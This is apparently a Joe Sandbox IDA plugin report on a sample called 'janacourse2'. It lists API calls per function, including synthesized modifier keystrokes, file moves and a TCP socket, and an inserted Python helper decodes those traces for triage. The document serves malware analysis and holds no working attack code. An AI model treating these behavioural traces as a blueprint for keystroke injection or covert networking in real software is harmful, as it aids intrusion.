                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 9969972717cb98195d0667bd97abb715e5bab3be6ecc1342408cc292c45ac4b3
                                                                                                            • Instruction ID: ee54861d7cf8b877c586b4bbddd3d9442919de9988b375ea6e7bb010dc2d50ae
                                                                                                            • Opcode Fuzzy Hash: 9969972717cb98195d0667bd97abb715e5bab3be6ecc1342408cc292c45ac4b3
                                                                                                            • Instruction Fuzzy Hash: B1915771D0420AAFDB11CFA9CD89EEEBBB8FF49320F148449E551B7291D378A941DB60
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 0103396B
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 01033A7A
                                                                                                            • _wcslen.LIBCMT ref: 01033A8A
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01033C1F
                                                                                                              • Part of subcall function 01020CDF: VariantInit.OLEAUT32(00000000), ref: 01020D1F
                                                                                                              • Part of subcall function 01020CDF: VariantCopy.OLEAUT32(?,?), ref: 01020D28
                                                                                                              • Part of subcall function 01020CDF: VariantClear.OLEAUT32(?), ref: 01020D34
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                            • Opcode ID: 3007ef5159343f879177147857a8239127461156ddd6a7c8409525efada37fd8
                                                                                                            • Instruction ID: 4a1d3f838b1aab320dfcb891dc8385674e9edf1bb3b1cb27df405433bf3754a5
                                                                                                            • Opcode Fuzzy Hash: 3007ef5159343f879177147857a8239127461156ddd6a7c8409525efada37fd8
                                                                                                            • Instruction Fuzzy Hash: D0915974A083059FC714DF29C58196ABBE8FFC9314F04886DF9899B351DB35E905CB92
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?,?,0101035E), ref: 0101002B
                                                                                                              • Part of subcall function 0101000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010046
                                                                                                              • Part of subcall function 0101000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010054
                                                                                                              • Part of subcall function 0101000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?), ref: 01010064
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01034C51
                                                                                                            • _wcslen.LIBCMT ref: 01034D59
                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01034DCF
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 01034DDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                            • String ID: NULL Pointer assignment
                                                                                                            • API String ID: 614568839-2785691316
                                                                                                            • Opcode ID: 3417fd956037cd0b90015fbb3745fe200a76f032c4c4a14390d2441d4c7a91f1
                                                                                                            • Instruction ID: d5fd66cc1c08143291a63e6161c1aa7adec4632e16457e3093f494720b0cd619
                                                                                                            • Opcode Fuzzy Hash: 3417fd956037cd0b90015fbb3745fe200a76f032c4c4a14390d2441d4c7a91f1
                                                                                                            • Instruction Fuzzy Hash: 44911771D0021DAFDF15DFA5CC90AEEBBB9BF48310F10816AE955AB241DB749A44CFA0
                                                                                                            APIs
                                                                                                            • GetMenu.USER32(?), ref: 01042183
                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 010421B5
                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010421DD
                                                                                                            • _wcslen.LIBCMT ref: 01042213
                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0104224D
                                                                                                            • GetSubMenu.USER32(?,?), ref: 0104225B
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010422E3
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4196846111-0
                                                                                                            • Opcode ID: c00cf0473aba5d5f696725a90bb39f4880590e1929c22708e3be73eea5ba765a
                                                                                                            • Instruction ID: dc5f6c3ad76a1bd948e42fc6426f2391271c78437f73c9bbed628964f8444e65
                                                                                                            • Opcode Fuzzy Hash: c00cf0473aba5d5f696725a90bb39f4880590e1929c22708e3be73eea5ba765a
                                                                                                            • Instruction Fuzzy Hash: 8F7192B5A00205AFCB10DF69D981AAEBBF1EF48310F1484A9F956EB345D734A9418F90
APIs
• GetParent.USER32(?), ref: 0101AEF9
• GetKeyboardState.USER32(?), ref: 0101AF0E
• SetKeyboardState.USER32(?), ref: 0101AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0101AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0101AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0101AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0101B020
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: a525477714e44b0d051c2ef0174336db3c7e83cc401f609a255ead36e329d7ce
• Instruction ID: d3e321d5ad8f2c3e79ff8acbb2a54f235b92e532d6a2875c9f8c06dfb0bec25e
• Opcode Fuzzy Hash: a525477714e44b0d051c2ef0174336db3c7e83cc401f609a255ead36e329d7ce
• Instruction Fuzzy Hash: 6151D1A0A057D57DFB3782788845BBABEE95B06304F0885CDF2D9468C7C39DA8C8D760
APIs
• GetParent.USER32(00000000), ref: 0101AD19
• GetKeyboardState.USER32(?), ref: 0101AD2E
• SetKeyboardState.USER32(?), ref: 0101AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0101ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0101ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0101AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0101AE38
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 039ac5a131498e9e7a40896ac07014e6a4d2b6f5ab3b8b41f2be0b40ec07ea16
• Instruction ID: 99d91cfcc7b44c6ef6283dbc57b2f6aa96953c0d1b194b4c6d40848e2ac7199a
• Opcode Fuzzy Hash: 039ac5a131498e9e7a40896ac07014e6a4d2b6f5ab3b8b41f2be0b40ec07ea16
• Instruction Fuzzy Hash: C451E6A17067D57EFB3392388C95BBA7EE85B46304F0884C8E1D6474C7C2ACE898D760
APIs
• GetConsoleCP.KERNEL32(00FF3CD6,?,?,?,?,?,?,?,?,00FE5BA3,?,?,00FF3CD6,?,?), ref: 00FE5470
• __fassign.LIBCMT ref: 00FE54EB
• __fassign.LIBCMT ref: 00FE5506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00FF3CD6,00000005,00000000,00000000), ref: 00FE552C
• WriteFile.KERNEL32(?,00FF3CD6,00000000,00FE5BA3,00000000,?,?,?,?,?,?,?,?,?,00FE5BA3,?), ref: 00FE554B
• WriteFile.KERNEL32(?,?,00000001,00FE5BA3,00000000,?,?,?,?,?,?,?,?,?,00FE5BA3,?), ref: 00FE5584
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 64d65abc6fc38b212ee8576d5a3b2355a05f11addaac1f101065d479b2f3d714
• Instruction ID: 87750800e593e6ea42c5f75c979658d7f83324735488147074fd5150cc1ddbcb
• Opcode Fuzzy Hash: 64d65abc6fc38b212ee8576d5a3b2355a05f11addaac1f101065d479b2f3d714
• Instruction Fuzzy Hash: 0251F4B1E007899FDB10CFA9D885AEEBBF9EF09714F18401AF955E7291D7309A40CB61
APIs
• _ValidateLocalCookies.LIBCMT ref: 00FD2D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 00FD2D53
• _ValidateLocalCookies.LIBCMT ref: 00FD2DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 00FD2E0C
• _ValidateLocalCookies.LIBCMT ref: 00FD2E61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 811ead290f6ca6e25e7ab806dd53471c821e59ea5a97166d6f1da7c9be1d91d1
• Instruction ID: f4f419129e76a745e7193962e0fa2c70289b89ed1623df99a0da5806d9ff5a3e
• Opcode Fuzzy Hash: 811ead290f6ca6e25e7ab806dd53471c821e59ea5a97166d6f1da7c9be1d91d1
• Instruction Fuzzy Hash: 6D41D235E00209ABCF10DF68CC85A9EBBB7BF54324F188156F9146B352D7369A01EBD1
APIs
  • Part of subcall function 0103304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
  • Part of subcall function 0103304E: _wcslen.LIBCMT ref: 0103309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01031112
• WSAGetLastError.WSOCK32 ref: 01031121
• WSAGetLastError.WSOCK32 ref: 010311C9
• closesocket.WSOCK32(00000000), ref: 010311F9
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: 7cde7b6ac8633170911b9ccbe3567097361c889f1e9b0f01fcc607236720d319
• Instruction ID: 852b0721eb4c9df7a78454de07223be2b961de69cd1adda68514094cdcb42d6a
• Opcode Fuzzy Hash: 7cde7b6ac8633170911b9ccbe3567097361c889f1e9b0f01fcc607236720d319
• Instruction Fuzzy Hash: 4B41D9756001049FE7109F14C984BEAB7EDFF85364F048099FC959B285C775AD41CBE1
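The two PostMessageW functions above and the socket() function here list their arguments as raw hex, which is what a triager has to decode by hand: message 0x0100/0x0101 is WM_KEYDOWN/WM_KEYUP, and wParam 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN, so the pair of functions is the press half and the release half of a synthesized modifier keystroke, bracketed by GetKeyboardState/SetKeyboardState (consistent with the report's note that the binary is likely a compiled AutoIt script, whose runtime synthesizes keystrokes this way). socket(2, 1, 6) is AF_INET, SOCK_STREAM, IPPROTO_TCP, i.e. a plain outbound TCP socket. The Python below is an added example, not Joe Sandbox tooling and not part of this report: it parses lines in the report's "• API.MODULE(args), ref: ADDR" format (including the indented "Part of subcall function" lines) and resolves those constants. The sample input is constructed from listing lines on this page; the table and function names are the example's own.

```python
"""Decode Joe Sandbox per-function API listings into a readable trace.

Added example: this is not Joe Sandbox tooling and not part of the report.
It parses lines in the report's "• API.MODULE(args), ref: ADDR" format and
resolves the hex arguments that matter for triage. Table and function names
are the example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input, copied from listing lines shown in this report.
SAMPLE_API_LINES = """\
• GetKeyboardState.USER32(?), ref: 0101AF0E
• SetKeyboardState.USER32(?), ref: 0101AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0101AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0101AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0101AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0101B020
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0101ADBB
  • Part of subcall function 0103304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01031112
• WSAGetLastError.WSOCK32 ref: 01031121
• closesocket.WSOCK32(00000000), ref: 010311F9
"""

# Windows SDK constants (winuser.h, winsock2.h) for the values seen above.
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
ADDRESS_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# One listing line: optional "Part of subcall function X:" prefix, API.MODULE,
# an optional parenthesised argument list, and the "ref:" call-site address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the tracer printed "?"
    ref: int                   # call-site address from the "ref:" field
    subcall_of: Optional[int] = None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every line in the listing format; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args") is not None:
            for raw in m.group("args").split(","):
                raw = raw.strip()
                if raw:
                    args.append(None if raw == "?" else int(raw, 16))
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls


def _name(table: dict, value: Optional[int]) -> str:
    """Symbolic name for a known constant, hex for unknown, '?' for untraced."""
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def describe(call: ApiCall) -> str:
    """Render one call with the triage-relevant arguments resolved."""
    if call.api == "PostMessageW" and len(call.args) >= 3:
        return (f"PostMessageW: {_name(WINDOW_MESSAGES, call.args[1])} "
                f"{_name(VIRTUAL_KEYS, call.args[2])}")
    if call.api == "socket" and len(call.args) >= 3:
        return (f"socket: {_name(ADDRESS_FAMILIES, call.args[0])}, "
                f"{_name(SOCKET_TYPES, call.args[1])}, {_name(PROTOCOLS, call.args[2])}")
    rendered = ", ".join("?" if a is None else f"0x{a:X}" for a in call.args)
    return f"{call.api}({rendered})"


def key_events(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(message, key) for each PostMessageW, e.g. ('WM_KEYUP', 'VK_SHIFT')."""
    return [(_name(WINDOW_MESSAGES, c.args[1]), _name(VIRTUAL_KEYS, c.args[2]))
            for c in calls if c.api == "PostMessageW" and len(c.args) >= 3]


def socket_params(calls: List[ApiCall]) -> Optional[Tuple[str, str, str]]:
    """Resolved (family, type, protocol) of the first socket() call, if any."""
    for c in calls:
        if c.api == "socket" and len(c.args) >= 3:
            return (_name(ADDRESS_FAMILIES, c.args[0]),
                    _name(SOCKET_TYPES, c.args[1]), _name(PROTOCOLS, c.args[2]))
    return None


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_API_LINES):
        prefix = f"(sub {call.subcall_of:08X}) " if call.subcall_of else ""
        print(f"{call.ref:08X}  {prefix}{describe(call)}")
```

Run on the sample, the first function resolves to four WM_KEYUP events for Shift, Ctrl, Alt and LWin and the second to the matching WM_KEYDOWN, which is the useful signal when deciding whether a PostMessageW-heavy function is UI plumbing from the AutoIt runtime or something the script itself drives. Arguments the tracer could not recover stay as "?" rather than being guessed.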
APIs
  • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101CF22,?), ref: 0101DDFD
  • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101CF22,?), ref: 0101DE16
• lstrcmpiW.KERNEL32(?,?), ref: 0101CF45
• MoveFileW.KERNEL32(?,?), ref: 0101CF7F
• _wcslen.LIBCMT ref: 0101D005
• _wcslen.LIBCMT ref: 0101D01B
• SHFileOperationW.SHELL32(?), ref: 0101D061
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
• Opcode ID: 93956bb84ef5e3fa23ff9a21a98895d10f35f6af72de827daedb3f7700ad6047
• Instruction ID: bf90a73e4dddbc2d07c81562cd00f78fea401f18f8ce394ea67085a2c44229d3
• Opcode Fuzzy Hash: 93956bb84ef5e3fa23ff9a21a98895d10f35f6af72de827daedb3f7700ad6047
• Instruction Fuzzy Hash: 754158719451195FEF52EFA4CE81ADD77F8AF08380F0400EAD549EB145EB39E644CB50
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01042E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 01042E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 01042E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01042EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01042EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 01042EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01042F0B
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 45676e78c04450f6f6a4d4217427411d6f5b28d6a897a14f045754ae194806ae
• Instruction ID: 320ea6dc2e74fc20058ff8168729c98e1f3c40bd74e4faf057fe88361234f151
• Opcode Fuzzy Hash: 45676e78c04450f6f6a4d4217427411d6f5b28d6a897a14f045754ae194806ae
• Instruction Fuzzy Hash: D33114B4705140AFEB31CF59EDC4F6937E0EB4A710F1501A4FAD48B2A6CB76A841DB40
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017769
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101778F
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 01017792
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010177B0
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 010177B9
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 010177DE
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010177EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: 9065af514eb8c5298676292251f63d5299cf9f890ba72295f432bae1262d4fe1
                                                                                                            • Instruction ID: 7c74563e06a2289fe3c83db1da9f979c8a893b40b7086a8608178a55c058d577
                                                                                                            • Opcode Fuzzy Hash: 9065af514eb8c5298676292251f63d5299cf9f890ba72295f432bae1262d4fe1
                                                                                                            • Instruction Fuzzy Hash: 6B21F47A600209AFEF10EEACCE88DBB77ECFB09360B008065FA55CB155DA78DC418760
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017842
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01017868
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0101786B
                                                                                                            • SysAllocString.OLEAUT32 ref: 0101788C
                                                                                                            • SysFreeString.OLEAUT32 ref: 01017895
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 010178AF
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 010178BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
